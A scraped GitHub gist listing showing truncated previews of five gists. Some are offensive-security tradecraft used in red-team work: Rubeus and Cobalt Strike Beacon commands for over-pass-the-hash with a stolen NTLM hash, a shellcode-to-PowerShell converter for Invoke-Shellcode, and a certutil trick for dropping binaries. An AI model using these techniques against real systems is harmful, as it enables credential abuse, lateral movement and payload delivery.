Skip to content

Instantly share code, notes, and snippets.

Avatar
🎯
Focusing

Chris Ross xorrior

🎯
Focusing
View GitHub Profile
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active Dec 9, 2020
Over-pass-the-hash with Rubeus and Beacon
View gist:dc379107cfb4aa7ef5c3ecbac0133a02
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@alirobe
alirobe / reclaimWindows10.ps1
Last active Feb 21, 2021
This Windows 10 Setup Script turns off a bunch of unnecessary Windows 10 telemetery, bloatware, & privacy things. Not guaranteed to catch everything. Review and tweak before running. Reboot after running. Scripts for reversing are included and commented. Fork of https://github.com/Disassembler0/Win10-Initial-Setup-Script (different defaults). N.…
View reclaimWindows10.ps1
##########
# Tweaked Win10 Initial Setup Script
# Primary Author: Disassembler <disassembler@dasm.cz>
# Modified by: alirobe <alirobe@alirobe.com> based on my personal preferences.
# Version: 2.20.2, 2018-09-14
# Primary Author Source: https://github.com/Disassembler0/Win10-Initial-Setup-Script
# Tweaked Source: https://gist.github.com/alirobe/7f3b34ad89a159e6daa1/
# Tweak difference:
#
# @alirobe's version is a subset focused on safely disabling telemetry, some 'smart' features and 3rd party bloat ...
@byt3bl33d3r
byt3bl33d3r / raw2ps_shellcode.py
Created Sep 13, 2015
Converts raw shellcode to a PowerShell compatible byte array (helpful when using custom shellcode with Invoke-Shellcode.ps1)
View raw2ps_shellcode.py
import sys
ps_shellcode = '@('
with open(sys.argv[1], 'rb') as shellcode:
byte = shellcode.read(1)
while byte != '':
ps_shellcode += '0x{}, '.format(byte.encode('hex'))
byte = shellcode.read(1)
@mattifestation
mattifestation / drop_binary.bat
Created Jul 12, 2015
Drop binary data from the command line w/o needing PowerShell
View drop_binary.bat
echo -----BEGIN CERTIFICATE----- > encoded.txt
echo Just Base64 encode your binary data
echo TVoAAA== >> encoded.txt
echo -----END CERTIFICATE----- >> encoded.txt
certutil -decode encoded.txt decoded.bin
@sivachandran
sivachandran / SimpleTcpRedirector.py
Created Mar 4, 2012
A simple TCP redirector in python
View SimpleTcpRedirector.py
#!/usr/bin/env python
import socket
import threading
import select
import sys
terminateAll = False
class ClientThread(threading.Thread):